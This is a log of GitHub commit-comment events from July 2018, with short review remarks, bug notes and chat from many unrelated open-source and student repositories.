{"id":"7902475372","type":"CommitCommentEvent","actor":{"login":"ShivamKumarJha"},"repo":{"name":"X00TD/android_device_asus_X00TD"},"payload":{"comment":{"id":29556505,"position":20,"line":66,"path":"proprietary-files.txt","commit_id":"91b6a2a6374583432f66defc12238f3de8b8164c","created_at":"2018-07-01T05:19:20Z","updated_at":"2018-07-01T05:19:20Z","author_association":"MEMBER","body":"i didnt had these before, added later. no diff. so bye bye again"}},"created_at":"2018-07-01T05:19:20Z"}
{"id":"7902475598","type":"CommitCommentEvent","actor":{"login":"ice1000"},"repo":{"name":"ckx-lang/ckxc-v2-proto"},"payload":{"comment":{"id":29556507,"position":28,"line":91,"path":"fuckyou/src/cn/ckxily/ckxc/lex/Lexer.kt","commit_id":"3c68f61fa1157aa8ad8686ab358719abbd0f6967","created_at":"2018-07-01T05:19:36Z","updated_at":"2018-07-01T05:19:36Z","author_association":"COLLABORATOR","body":"@ICEYSELF `const val`s are compile-time constants, allows constant folding."}},"created_at":"2018-07-01T05:19:36Z"}
{"id":"7902475689","type":"CommitCommentEvent","actor":{"login":"ShivamKumarJha"},"repo":{"name":"X00TD/android_device_asus_X00TD"},"payload":{"comment":{"id":29556508,"position":31,"line":142,"path":"proprietary-files.txt","commit_id":"91b6a2a6374583432f66defc12238f3de8b8164c","created_at":"2018-07-01T05:19:42Z","updated_at":"2018-07-01T05:19:42Z","author_association":"MEMBER","body":"this file is fekking ~25MB, not needed"}},"created_at":"2018-07-01T05:19:42Z"}
{"id":"7902475717","type":"CommitCommentEvent","actor":{"login":"Mitzz"},"repo":{"name":"Mitzz/Refractoring"},"payload":{"comment":{"id":29556509,"position":null,"line":null,"path":null,"commit_id":"f6206d58dac0f16dd437bc8c6c599feeba994f5f","created_at":"2018-07-01T05:19:44Z","updated_at":"2018-07-01T05:19:44Z","author_association":"OWNER","body":"![image](https://user-images.githubusercontent.com/3115439/42131276-5dbe5830-7d1c-11e8-88c6-38ffc94586e8.png)\r\n![image](https://user-images.githubusercontent.com/3115439/42131278-74568612-7d1c-11e8-8ef9-bcf2c923d427.png)\r\n"}},"created_at":"2018-07-01T05:19:44Z"}
{"id":"7902475909","type":"CommitCommentEvent","actor":{"login":"ShivamKumarJha"},"repo":{"name":"X00TD/android_device_asus_X00TD"},"payload":{"comment":{"id":29556512,"position":103,"line":232,"path":"proprietary-files.txt","commit_id":"91b6a2a6374583432f66defc12238f3de8b8164c","created_at":"2018-07-01T05:19:57Z","updated_at":"2018-07-01T05:19:57Z","author_association":"MEMBER","body":"this can be removed, tested"}},"created_at":"2018-07-01T05:19:57Z"}
{"id":"7902475991","type":"CommitCommentEvent","actor":{"login":"Mitzz"},"repo":{"name":"Mitzz/Refractoring"},"payload":{"comment":{"id":29556513,"position":null,"line":null,"path":null,"commit_id":"f6206d58dac0f16dd437bc8c6c599feeba994f5f","created_at":"2018-07-01T05:20:03Z","updated_at":"2018-07-01T05:20:03Z","author_association":"OWNER","body":"![image](https://user-images.githubusercontent.com/3115439/42131279-800172a6-7d1c-11e8-8531-473d2ca397ba.png)\r\n"}},"created_at":"2018-07-01T05:20:03Z"}
{"id":"7902476023","type":"CommitCommentEvent","actor":{"login":"ice1000"},"repo":{"name":"ckx-lang/ckxc-v2-proto"},"payload":{"comment":{"id":29556514,"position":11,"line":14,"path":"fuckyou/src/cn/ckxily/ckxc/err/err.kt","commit_id":"f2af8a8c64cf02b6c2d80c4a396d788ed1f6180e","created_at":"2018-07-01T05:20:05Z","updated_at":"2018-07-01T05:20:05Z","author_association":"COLLABORATOR","body":"@ICEYSELF Since `exit` exits the program, we can xjb cast its return value."}},"created_at":"2018-07-01T05:20:05Z"}
{"id":"7902476073","type":"CommitCommentEvent","actor":{"login":"MobyGamer"},"repo":{"name":"MobyGamer/total-dos-launcher"},"payload":{"comment":{"id":29556515,"position":null,"line":null,"path":null,"commit_id":"02277dbe2a7b0a25778eae6889ca7ab379a51221","created_at":"2018-07-01T05:20:08Z","updated_at":"2018-07-01T05:20:08Z","author_association":"OWNER","body":"This was tested successfully, and closes #38 "}},"created_at":"2018-07-01T05:20:08Z"}
{"id":"7902476378","type":"CommitCommentEvent","actor":{"login":"Mitzz"},"repo":{"name":"Mitzz/Refractoring"},"payload":{"comment":{"id":29556516,"position":null,"line":null,"path":null,"commit_id":"f6206d58dac0f16dd437bc8c6c599feeba994f5f","created_at":"2018-07-01T05:20:22Z","updated_at":"2018-07-01T05:20:22Z","author_association":"OWNER","body":"![image](https://user-images.githubusercontent.com/3115439/42131282-8b3694ee-7d1c-11e8-81c1-bd349c757349.png)\r\n"}},"created_at":"2018-07-01T05:20:22Z"}
{"id":"7902476687","type":"CommitCommentEvent","actor":{"login":"ice1000"},"repo":{"name":"ckx-lang/ckxc-v2-proto"},"payload":{"comment":{"id":29556518,"position":9,"line":10,"path":"fuckyou/src/cn/ckxily/ckxc/parser/Parser.kt","commit_id":"f2af8a8c64cf02b6c2d80c4a396d788ed1f6180e","created_at":"2018-07-01T05:20:43Z","updated_at":"2018-07-01T05:20:43Z","author_association":"COLLABORATOR","body":"Ur call to `error` is originally `kotlin.error`, I've created an alias to the stdlib one and import ur own impl."}},"created_at":"2018-07-01T05:20:43Z"}
{"id":"7902476714","type":"CommitCommentEvent","actor":{"login":"ShivamKumarJha"},"repo":{"name":"X00TD/android_device_asus_X00TD"},"payload":{"comment":{"id":29556519,"position":207,"line":2835,"path":"proprietary-files.txt","commit_id":"91b6a2a6374583432f66defc12238f3de8b8164c","created_at":"2018-07-01T05:20:45Z","updated_at":"2018-07-01T05:20:45Z","author_association":"MEMBER","body":"this to check if it fixes random rotation lag"}},"created_at":"2018-07-01T05:20:45Z"}
{"id":"7902476984","type":"CommitCommentEvent","actor":{"login":"ShivamKumarJha"},"repo":{"name":"X00TD/android_device_asus_X00TD"},"payload":{"comment":{"id":29556521,"position":240,"line":3168,"path":"proprietary-files.txt","commit_id":"91b6a2a6374583432f66defc12238f3de8b8164c","created_at":"2018-07-01T05:21:04Z","updated_at":"2018-07-01T05:21:04Z","author_association":"MEMBER","body":"this is moved to top in correct nfc section"}},"created_at":"2018-07-01T05:21:04Z"}
{"id":"7902477344","type":"CommitCommentEvent","actor":{"login":"ice1000"},"repo":{"name":"ckx-lang/ckxc-v2-proto"},"payload":{"comment":{"id":29556522,"position":55,"line":126,"path":"fuckyou/src/cn/ckxily/ckxc/parser/Parser.kt","commit_id":"f2af8a8c64cf02b6c2d80c4a396d788ed1f6180e","created_at":"2018-07-01T05:21:27Z","updated_at":"2018-07-01T05:21:27Z","author_association":"COLLABORATOR","body":"Sorry for this. I didn't realize IDEA has automatically formatted it.."}},"created_at":"2018-07-01T05:21:27Z"}
{"id":"7902477444","type":"CommitCommentEvent","actor":{"login":"ShivamKumarJha"},"repo":{"name":"X00TD/android_device_asus_X00TD"},"payload":{"comment":{"id":29556523,"position":224,"line":3053,"path":"proprietary-files.txt","commit_id":"91b6a2a6374583432f66defc12238f3de8b8164c","created_at":"2018-07-01T05:21:35Z","updated_at":"2018-07-01T05:21:35Z","author_association":"MEMBER","body":"this can mostly be removed, asus added in 309 ota . for nfc ig. gotta dig\r\n"}},"created_at":"2018-07-01T05:21:35Z"}
{"id":"7902477640","type":"CommitCommentEvent","actor":{"login":"Mitzz"},"repo":{"name":"Mitzz/Refractoring"},"payload":{"comment":{"id":29556524,"position":null,"line":null,"path":null,"commit_id":"f892597cd6589bd69c738bfcb07253e777750e73","created_at":"2018-07-01T05:21:50Z","updated_at":"2018-07-01T05:21:50Z","author_association":"OWNER","body":"![image](https://user-images.githubusercontent.com/3115439/42131289-bf98dd50-7d1c-11e8-8710-151274aa8551.png)\r\n"}},"created_at":"2018-07-01T05:21:50Z"}
{"id":"7902477723","type":"CommitCommentEvent","actor":{"login":"ice1000"},"repo":{"name":"ckx-lang/ckxc-v2-proto"},"payload":{"comment":{"id":29556525,"position":5,"line":21,"path":"fuckyou/src/cn/ckxily/ckxc/lex/test/lexertest.kt","commit_id":"b7b1b47e2e9f9948be31ee1a0ce9a20f5ab71d53","created_at":"2018-07-01T05:21:56Z","updated_at":"2018-07-01T05:21:56Z","author_association":"COLLABORATOR","body":"`println(any: Any) = println(any.toString())`"}},"created_at":"2018-07-01T05:21:56Z"}
{"id":"7902478140","type":"CommitCommentEvent","actor":{"login":"ice1000"},"repo":{"name":"ckx-lang/ckxc-v2-proto"},"payload":{"comment":{"id":29556526,"position":5,"line":21,"path":"fuckyou/src/cn/ckxily/ckxc/lex/test/lexertest.kt","commit_id":"b7b1b47e2e9f9948be31ee1a0ce9a20f5ab71d53","created_at":"2018-07-01T05:22:26Z","updated_at":"2018-07-01T05:22:26Z","author_association":"COLLABORATOR","body":"If u write this using Java, IntelliJ will mark `toString()` as \"unused\"."}},"created_at":"2018-07-01T05:22:26Z"}
{"id":"7902478535","type":"CommitCommentEvent","actor":{"login":"Mitzz"},"repo":{"name":"Mitzz/Refractoring"},"payload":{"comment":{"id":29556527,"position":null,"line":null,"path":null,"commit_id":"9194e51e19f7b5aaffce8596f977c8f3e9c68358","created_at":"2018-07-01T05:22:54Z","updated_at":"2018-07-01T05:22:54Z","author_association":"OWNER","body":"![image](https://user-images.githubusercontent.com/3115439/42131294-e5bc085e-7d1c-11e8-8794-618d92664eb9.png)\r\n"}},"created_at":"2018-07-01T05:22:54Z"}
{"id":"7902483958","type":"CommitCommentEvent","actor":{"login":"idsb3t1"},"repo":{"name":"idsb3t1/UI-ys1int-KEEP-TC"},"payload":{"comment":{"id":29556539,"position":null,"line":null,"path":null,"commit_id":"71dff85913b10cc1d2c65dd537918bc838b10830","created_at":"2018-07-01T05:28:57Z","updated_at":"2018-07-01T05:28:57Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.stage1.bluemix.net/devops/toolchains/ee7af0c7-eb4b-4808-84ae-65a1ebf892f4?env_id=ibm%3Ays1%3Aus-south \"UI-ys1int-KEEP-TC\"): [Delivery Pipeline](https://console.stage1.bluemix.net/devops/pipelines/9602ba9a-db4c-42c8-81d1-69655e515efe?env_id=ibm%3Ays1%3Aus-south \"UI-ys1int-KEEP-TC\") deployed [UI-ys1int-KEEP-TC](https://github.com/idsb3t1/UI-ys1int-KEEP-TC/releases/tag/deploy-ibm-ys1-us-south-idsb3t2-us.ibm.com-dev-20180701-052856 \"deploy-ibm-ys1-us-south-idsb3t2-us.ibm.com-dev-20180701-052856\") to [dev](https://console.stage1.bluemix.net/apps/e0173942-fbb5-42df-a8ff-cca49f037241?env_id=ibm:ys1:us-south \"ibm:ys1:us-south:idsb3t2@us.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-01T05:28:57Z"}
{"id":"7902486042","type":"CommitCommentEvent","actor":{"login":"Glorybow"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29556544,"position":null,"line":null,"path":null,"commit_id":"0ff8efab714a837f3c037e13c150f203fb50cce7","created_at":"2018-07-01T05:31:02Z","updated_at":"2018-07-01T05:31:02Z","author_association":"NONE","body":"level 21 or above already reach their Rank 6 badge"}},"created_at":"2018-07-01T05:31:02Z"}
{"id":"7902486525","type":"CommitCommentEvent","actor":{"login":"xPaw"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29556545,"position":null,"line":null,"path":null,"commit_id":"0ff8efab714a837f3c037e13c150f203fb50cce7","created_at":"2018-07-01T05:31:33Z","updated_at":"2018-07-01T05:31:33Z","author_association":"MEMBER","body":"I changed the trigger back to level 21 in last update as enough people have reached it by now to make a difference.\r\n\r\nValve employee has confirmed that the randomizer did in fact help spread out the server load, which means the error rates decreased for *everyone*.\r\n\r\nHe also said that bosses will be more frequent now."}},"created_at":"2018-07-01T05:31:33Z"}
{"id":"7902486529","type":"CommitCommentEvent","actor":{"login":"Bubbymathis"},"repo":{"name":"Bubbymathis/spree"},"payload":{"comment":{"id":29556546,"position":null,"line":null,"path":null,"commit_id":"3ab453568de4899b12014b3528f70a17d741f684","created_at":"2018-07-01T05:31:34Z","updated_at":"2018-07-01T05:31:34Z","author_association":"OWNER","body":"Trying my best. Just now starting to get a feel for it. Trying to get my Phone, Tv n computers all linked as well. Was a bunch of lessons n videos I missed. Was waking up to at least 6700 emails!!! Couldn't keep up!!!"}},"created_at":"2018-07-01T05:31:34Z"}
{"id":"7902493790","type":"CommitCommentEvent","actor":{"login":"kaviyabakiyavel"},"repo":{"name":"kaviyabakiyavel/kaviyabaki"},"payload":{"comment":{"id":29556554,"position":null,"line":null,"path":null,"commit_id":"c1b57b74021d76441c32c2d61cae9f8d1869df73","created_at":"2018-07-01T05:40:04Z","updated_at":"2018-07-01T05:40:04Z","author_association":"OWNER","body":"this is my casetool 2 lab created by 1 july"}},"created_at":"2018-07-01T05:40:04Z"}
{"id":"7902496163","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"AShalysh/ruby_tasks"},"payload":{"comment":{"id":29556560,"position":12,"line":5,"path":"lesson7/cargo_carriage.rb","commit_id":"a10f6098dc87322a19ed1f6a2e8a78fb421980c6","created_at":"2018-07-01T05:42:50Z","updated_at":"2018-07-01T05:42:50Z","author_association":"NONE","body":"теперь еще лучше )\r\nно можено продвинуться еще на один шаг в сторону использования наследования / полиморфизма\r\n\r\nпрошлый раз я написал следующее:\r\n\r\n>     по сути в подклассах можно все свести только к вызову `super`\r\n\r\nметод `book_volume(given_volume)` из класса `CargoCarriage` можно перенести в класс `Carriage`\r\nтогда в КаргоКэрридж его переопределять не придется, класс будет использовать метод родителя\r\nв классе же `PassengerCarriage` метод `book_seat` нужно удалить и вместо этого переопределить собственно метод `book_volume`\r\nв классе ПассажирскийВагон этот мтеод не должен принимать аргументы, потому что по ТЗ у нас места должны заниматься под одному... при этом нам бы хотелось использовать метод родителя\r\nчтобы выполнить оба этих требования в классе ПассажирскийВагон метод нужно переопределить вот так:\r\n```ruby\r\ndef book_volume\r\n  super 1\r\nend\r\n```\r\n- имя то же, что и в родителе, а значит можно использовать \"супер\"\r\n- аргументов не принимает, что выполняет требование ТЗ\r\n- занимает по одному месту, что также выполняет требование ТЗ\r\n- использует функционал родительского метода, с помощью вызова \"супер\", что является хорошим примером использования механизмов наследования и полиморфизма )))"}},"created_at":"2018-07-01T05:42:50Z"}
{"id":"7902497685","type":"CommitCommentEvent","actor":{"login":"Yu-hanCheng"},"repo":{"name":"SarahYuHanCheng/Flask_microblog"},"payload":{"comment":{"id":29556565,"position":null,"line":null,"path":null,"commit_id":"e00e426c3667c211928ad3fb93e0771566d070fe","created_at":"2018-07-01T05:44:37Z","updated_at":"2018-07-01T05:44:37Z","author_association":"NONE","body":"There is a loginManager instance In __init__.py, so there is no need to do again in models\r\nlogin = LoginManager(app)"}},"created_at":"2018-07-01T05:44:37Z"}
{"id":"7902498689","type":"CommitCommentEvent","actor":{"login":"philipbelesky"},"repo":{"name":"TabbycatDebate/tabbycat"},"payload":{"comment":{"id":29556571,"position":4,"line":9,"path":"tabbycat/privateurls/templates/private_urls_nav.html","commit_id":"1b0bcbf34c6fa84cbd525f9e5afe19b568a4c0db","created_at":"2018-07-01T05:45:48Z","updated_at":"2018-07-01T05:45:48Z","author_association":"MEMBER","body":"Ah good catch! My bad"}},"created_at":"2018-07-01T05:45:48Z"}
{"id":"7902501694","type":"CommitCommentEvent","actor":{"login":"protox"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29556575,"position":null,"line":null,"path":null,"commit_id":"0ff8efab714a837f3c037e13c150f203fb50cce7","created_at":"2018-07-01T05:49:02Z","updated_at":"2018-07-01T05:49:02Z","author_association":"NONE","body":"It seems rather pointless to go above 21 anyways, the chance of them adding another badge rank above 21 is low? At the same time why does the rank keep going up to 25? Odd."}},"created_at":"2018-07-01T05:49:02Z"}
{"id":"7902501818","type":"CommitCommentEvent","actor":{"login":"elthran"},"repo":{"name":"elthran/BookingSystem"},"payload":{"comment":{"id":29556577,"position":10,"line":86,"path":"booking/models/users.py","commit_id":"b5c4ce88ac74bfdf8c36d32dec30317365b59ba0","created_at":"2018-07-01T05:49:10Z","updated_at":"2018-07-01T05:49:10Z","author_association":"OWNER","body":"It sorts them in order, so first by day and then by start time :)"}},"created_at":"2018-07-01T05:49:10Z"}
{"id":"7902504037","type":"CommitCommentEvent","actor":{"login":"chenzhen123"},"repo":{"name":"chenzhen123/demo"},"payload":{"comment":{"id":29556581,"position":null,"line":null,"path":null,"commit_id":"a848335274b560573307cbd03b0fe4c01588394c","created_at":"2018-07-01T05:51:36Z","updated_at":"2018-07-01T05:51:36Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-01T05:51:36Z"}
{"id":"7902504098","type":"CommitCommentEvent","actor":{"login":"buxstore"},"repo":{"name":"platinum4/NemosMiner"},"payload":{"comment":{"id":29556582,"position":null,"line":null,"path":null,"commit_id":"91a1b00bc76e3aa8efb1fc4ffc6d1d00ebfcc0a3","created_at":"2018-07-01T05:51:39Z","updated_at":"2018-07-01T05:51:39Z","author_association":"NONE","body":"https://github.com/CryptoDredge/beta/releases/tag/v0.6.0-beta.2 should be compatible with awesome miner as ccminer 2.3\r\nCould you check it?\r\nAPI had added"}},"created_at":"2018-07-01T05:51:39Z"}
{"id":"7902505705","type":"CommitCommentEvent","actor":{"login":"kyriejoshua"},"repo":{"name":"ppoffice/hexo-theme-minos"},"payload":{"comment":{"id":29556585,"position":5,"line":5,"path":"source/css/style.scss","commit_id":"38f302b547aacd0833749944dd775281b3ead902","created_at":"2018-07-01T05:53:33Z","updated_at":"2018-07-01T05:53:33Z","author_association":"NONE","body":"这里的引入方式要不要考虑优化下呀。。"}},"created_at":"2018-07-01T05:53:33Z"}
{"id":"7902512187","type":"CommitCommentEvent","actor":{"login":"alexmarch232"},"repo":{"name":"alexmarch232/Forum-Site-News"},"payload":{"comment":{"id":29556607,"position":null,"line":null,"path":null,"commit_id":"e33bc17e4d3d66b44b856bfc4421f3ab21ca2210","created_at":"2018-07-01T06:00:54Z","updated_at":"2018-07-01T06:00:54Z","author_association":"OWNER","body":"WTF???"}},"created_at":"2018-07-01T06:00:54Z"}
{"id":"7902514111","type":"CommitCommentEvent","actor":{"login":"jordanlui"},"repo":{"name":"jordanlui/Omron-Arduino"},"payload":{"comment":{"id":29556616,"position":null,"line":null,"path":null,"commit_id":"7a86ac8094d3e5b7b8becd9b5e222810f3f598a1","created_at":"2018-07-01T06:02:50Z","updated_at":"2018-07-01T06:02:50Z","author_association":"OWNER","body":"Hi there,\r\nReading data from Omron 8x1 doesn't require the WireExt.h library so it's OK for this to be commented out in this case.\r\n\r\nThe code at \"https://github.com/rch33/Omron-Arduino\" is made for a 4x4 Omron sensor and you have to properly add the WireExt.h library to your Arduino libraries for Arduino IDE to find this at compile time.\r\n\r\nThe existing WireExt.h file in the repo should work, but I'll add a zip file in a folder. Download this zip install it as a library with Arduino IDE and this should work for you!"}},"created_at":"2018-07-01T06:02:50Z"}
{"id":"7902517022","type":"CommitCommentEvent","actor":{"login":"obache"},"repo":{"name":"groonga/groonga"},"payload":{"comment":{"id":29556624,"position":null,"line":null,"path":null,"commit_id":"7c408a2bd6ff05198952d82e7fec425082a963eb","created_at":"2018-07-01T06:06:10Z","updated_at":"2018-07-01T06:06:10Z","author_association":"CONTRIBUTOR","body":"This change may cause another issues.\r\nFor example, if gcc with -fstack-protector already override memcpy with macros,\r\nthen redefined warnings will rise at build time,\r\nstack protectors may be killed at runtime. "}},"created_at":"2018-07-01T06:06:10Z"}
{"id":"7902518254","type":"CommitCommentEvent","actor":{"login":"karthikgithubarthi"},"repo":{"name":"karthikgithubarthi/myfirstproject"},"payload":{"comment":{"id":29556628,"position":null,"line":null,"path":null,"commit_id":"e3ac461fe898e8a860fba66a72faa6bffd60a58a","created_at":"2018-07-01T06:07:39Z","updated_at":"2018-07-01T06:07:39Z","author_association":"OWNER","body":"asfda"}},"created_at":"2018-07-01T06:07:39Z"}
{"id":"7902518913","type":"CommitCommentEvent","actor":{"login":"Mitzz"},"repo":{"name":"Mitzz/Refractoring"},"payload":{"comment":{"id":29556630,"position":null,"line":null,"path":null,"commit_id":"5a587942c6527b335bb776356afeb3847af9458b","created_at":"2018-07-01T06:08:28Z","updated_at":"2018-07-01T06:08:28Z","author_association":"OWNER","body":"![image](https://user-images.githubusercontent.com/3115439/42131586-30a95370-7d23-11e8-9569-2ba3a68ed68e.png)\r\n![image](https://user-images.githubusercontent.com/3115439/42131589-42e26b12-7d23-11e8-8af7-21c7b4d8565c.png)\r\n"}},"created_at":"2018-07-01T06:08:28Z"}
{"id":"7902519424","type":"CommitCommentEvent","actor":{"login":"mfs91930"},"repo":{"name":"mfs91930/web1"},"payload":{"comment":{"id":29556633,"position":null,"line":null,"path":null,"commit_id":"019bd3180faab338e5909d7d0e5d976239c7f5a4","created_at":"2018-07-01T06:09:03Z","updated_at":"2018-07-01T06:09:03Z","author_association":"OWNER","body":"planc logo"}},"created_at":"2018-07-01T06:09:03Z"}
{"id":"7902519494","type":"CommitCommentEvent","actor":{"login":"Mitzz"},"repo":{"name":"Mitzz/Refractoring"},"payload":{"comment":{"id":29556634,"position":null,"line":null,"path":null,"commit_id":"5a587942c6527b335bb776356afeb3847af9458b","created_at":"2018-07-01T06:09:08Z","updated_at":"2018-07-01T06:09:08Z","author_association":"OWNER","body":"![image](https://user-images.githubusercontent.com/3115439/42131591-5b7c86da-7d23-11e8-84df-39c7da8fe91f.png)\r\n"}},"created_at":"2018-07-01T06:09:08Z"}
{"id":"7902520489","type":"CommitCommentEvent","actor":{"login":"Mitzz"},"repo":{"name":"Mitzz/Refractoring"},"payload":{"comment":{"id":29556639,"position":null,"line":null,"path":null,"commit_id":"5a587942c6527b335bb776356afeb3847af9458b","created_at":"2018-07-01T06:10:14Z","updated_at":"2018-07-01T06:10:14Z","author_association":"OWNER","body":"![image](https://user-images.githubusercontent.com/3115439/42131596-6f9e2448-7d23-11e8-86aa-4c86d8b4df44.png)\r\n![image](https://user-images.githubusercontent.com/3115439/42131603-82d4cd0a-7d23-11e8-89a3-277d46418528.png)\r\n"}},"created_at":"2018-07-01T06:10:14Z"}
{"id":"7902523886","type":"CommitCommentEvent","actor":{"login":"drsm"},"repo":{"name":"nginx/njs"},"payload":{"comment":{"id":29556642,"position":null,"line":null,"path":null,"commit_id":"7cacebeb562e5156987c35ca34a473f4fadd869a","created_at":"2018-07-01T06:13:56Z","updated_at":"2018-07-01T06:13:56Z","author_association":"NONE","body":"Hi, there!\r\nthis commit broke things which are already broken ).\r\nsomething like njs_is_valid_index is needed here, not sure it exists\r\n```shell\r\n>> var n = [];\r\nundefined\r\n>> n.length = '1'\r\nRangeError: Invalid array length\r\n    at main (native)\r\n\r\n>> n.length = null\r\nRangeError: Invalid array length\r\n    at main (native)\r\n\r\n>> n.length = new Number(2)\r\nRangeError: Invalid array length\r\n    at main (native)\r\n```\r\nnode:\r\n```shell\r\n> var n = [];\r\nundefined\r\n> n.length = null;\r\nnull\r\n> n.length = new Number(2);\r\n[Number: 2]\r\n> n\r\n[ <2 empty items> ]\r\n> n.length = '1';\r\n'1'\r\n> \r\n> n.length = NaN\r\nRangeError: Invalid array length\r\n> n.length = 0.1\r\nRangeError: Invalid array length\r\n> n.length = -1\r\nRangeError: Invalid array length\r\n> n.length = 1.1\r\n```\r\n"}},"created_at":"2018-07-01T06:13:56Z"}
{"id":"7902525026","type":"CommitCommentEvent","actor":{"login":"CxpcakeTheDerp"},"repo":{"name":"CxpcakeTheDerp/Amethyst-Virtual-Processor"},"payload":{"comment":{"id":29556646,"position":null,"line":null,"path":null,"commit_id":"8548fb8662007f0d0458db5b148120f937918399","created_at":"2018-07-01T06:15:19Z","updated_at":"2018-07-01T06:15:19Z","author_association":"OWNER","body":"Good thing I've found the problem before I ran it."}},"created_at":"2018-07-01T06:15:19Z"}
{"id":"7902526713","type":"CommitCommentEvent","actor":{"login":"martin-ger"},"repo":{"name":"martin-ger/esp_wifi_repeater"},"payload":{"comment":{"id":29556648,"position":null,"line":null,"path":null,"commit_id":"c0ffbd690cb14b6c2c46aa3bb76384a2782b7178","created_at":"2018-07-01T06:17:12Z","updated_at":"2018-07-01T06:17:12Z","author_association":"OWNER","body":"The code comes from various sources. To my understanding none of these prohibits changes and commercial use. My code is free for any use."}},"created_at":"2018-07-01T06:17:12Z"}
{"id":"7902536488","type":"CommitCommentEvent","actor":{"login":"MeiGuddet"},"repo":{"name":"berlinux2016/MIUI10"},"payload":{"comment":{"id":29556670,"position":null,"line":null,"path":null,"commit_id":"2b364271ce2f1d5418402da0d8c5bbd213267423","created_at":"2018-07-01T06:28:19Z","updated_at":"2018-07-01T06:28:19Z","author_association":"COLLABORATOR","body":"Das sieht richtig aus: Zwischen Zahl und Einheit kommt ein Leerzeichen, ist im Deutschen halt so.\r\nEs heißt auch 5 GB, 5 MB, genau wie 5 kg, 5 km, 5 m, 5 cm."}},"created_at":"2018-07-01T06:28:19Z"}
{"id":"7902537916","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"pyltsin/otus-spring"},"payload":{"comment":{"id":29556671,"position":18,"line":27,"path":".gitignore","commit_id":"39e4a82d624594a8b3bca22b8ed2958815cc64e2","created_at":"2018-07-01T06:29:57Z","updated_at":"2018-07-01T06:29:57Z","author_association":"NONE","body":"Лучше не удалять пустую строку в конце файла)"}},"created_at":"2018-07-01T06:29:57Z"}
{"id":"7902538525","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"pyltsin/otus-spring"},"payload":{"comment":{"id":29556675,"position":3,"line":3,"path":"src/main/java/com/otus/spring/GameEngineImpl.java","commit_id":"39e4a82d624594a8b3bca22b8ed2958815cc64e2","created_at":"2018-07-01T06:30:29Z","updated_at":"2018-07-01T06:30:29Z","author_association":"NONE","body":"Форматирование немножко поехало."}},"created_at":"2018-07-01T06:30:29Z"}
{"id":"7902539327","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"pyltsin/otus-spring"},"payload":{"comment":{"id":29556677,"position":22,"line":22,"path":"pom.xml","commit_id":"39e4a82d624594a8b3bca22b8ed2958815cc64e2","created_at":"2018-07-01T06:31:15Z","updated_at":"2018-07-01T06:31:15Z","author_association":"NONE","body":"В идеале ещё запись Main-Class в манифест добавить... ЧТобы запукался в Jar."}},"created_at":"2018-07-01T06:31:15Z"}
{"id":"7902540421","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"pyltsin/otus-spring"},"payload":{"comment":{"id":29556678,"position":3,"line":3,"path":"src/main/java/com/otus/spring/Reader.java","commit_id":"39e4a82d624594a8b3bca22b8ed2958815cc64e2","created_at":"2018-07-01T06:32:28Z","updated_at":"2018-07-01T06:32:28Z","author_association":"NONE","body":"Если честно - это просто замечательно, что Вы вынесли эту абстракцию."}},"created_at":"2018-07-01T06:32:28Z"}
{"id":"7902541462","type":"CommitCommentEvent","actor":{"login":"Mr-ycx"},"repo":{"name":"Mr-ycx/Resources"},"payload":{"comment":{"id":29556679,"position":null,"line":null,"path":null,"commit_id":"c29bc96978be5dd22248d9008bae8e95e572c508","created_at":"2018-07-01T06:33:34Z","updated_at":"2018-07-01T06:33:34Z","author_association":"OWNER","body":"Ubuntu 18.04安装"}},"created_at":"2018-07-01T06:33:34Z"}
{"id":"7902542833","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"pyltsin/otus-spring"},"payload":{"comment":{"id":29556680,"position":14,"line":14,"path":"src/main/java/com/otus/spring/ReaderImpl.java","commit_id":"39e4a82d624594a8b3bca22b8ed2958815cc64e2","created_at":"2018-07-01T06:35:03Z","updated_at":"2018-07-01T06:35:03Z","author_association":"NONE","body":"Сканнер можно создать и в методе read. В идеале сервис должен быть stateless и не хранить состояние - только зависимости."}},"created_at":"2018-07-01T06:35:03Z"}
{"id":"7902542981","type":"CommitCommentEvent","actor":{"login":"AllenChong"},"repo":{"name":"ckolivas/cgminer"},"payload":{"comment":{"id":29556682,"position":null,"line":null,"path":null,"commit_id":"80285bd1d746b0869395f13d529bc1a82a3cd403","created_at":"2018-07-01T06:35:12Z","updated_at":"2018-07-01T06:35:12Z","author_association":"NONE","body":"80285bd"}},"created_at":"2018-07-01T06:35:12Z"}
{"id":"7902543531","type":"CommitCommentEvent","actor":{"login":"Sakshisharma811308"},"repo":{"name":"Sakshisharma811308/websmass"},"payload":{"comment":{"id":29556683,"position":null,"line":null,"path":null,"commit_id":"6b8b5c63953e58c354839e4d902d4d829a62b943","created_at":"2018-07-01T06:35:49Z","updated_at":"2018-07-01T06:35:49Z","author_association":"OWNER","body":"this my site"}},"created_at":"2018-07-01T06:35:49Z"}
{"id":"7902543561","type":"CommitCommentEvent","actor":{"login":"mapx-"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29556684,"position":null,"line":null,"path":null,"commit_id":"d4a1a812a8eca981cd707358373b13c2c4c1a1f9","created_at":"2018-07-01T06:35:51Z","updated_at":"2018-07-01T06:35:51Z","author_association":"CONTRIBUTOR","body":"already added here\r\nhttps://github.com/uBlockOrigin/uAssets/blob/master/filters/filters.txt#L9192"}},"created_at":"2018-07-01T06:35:51Z"}
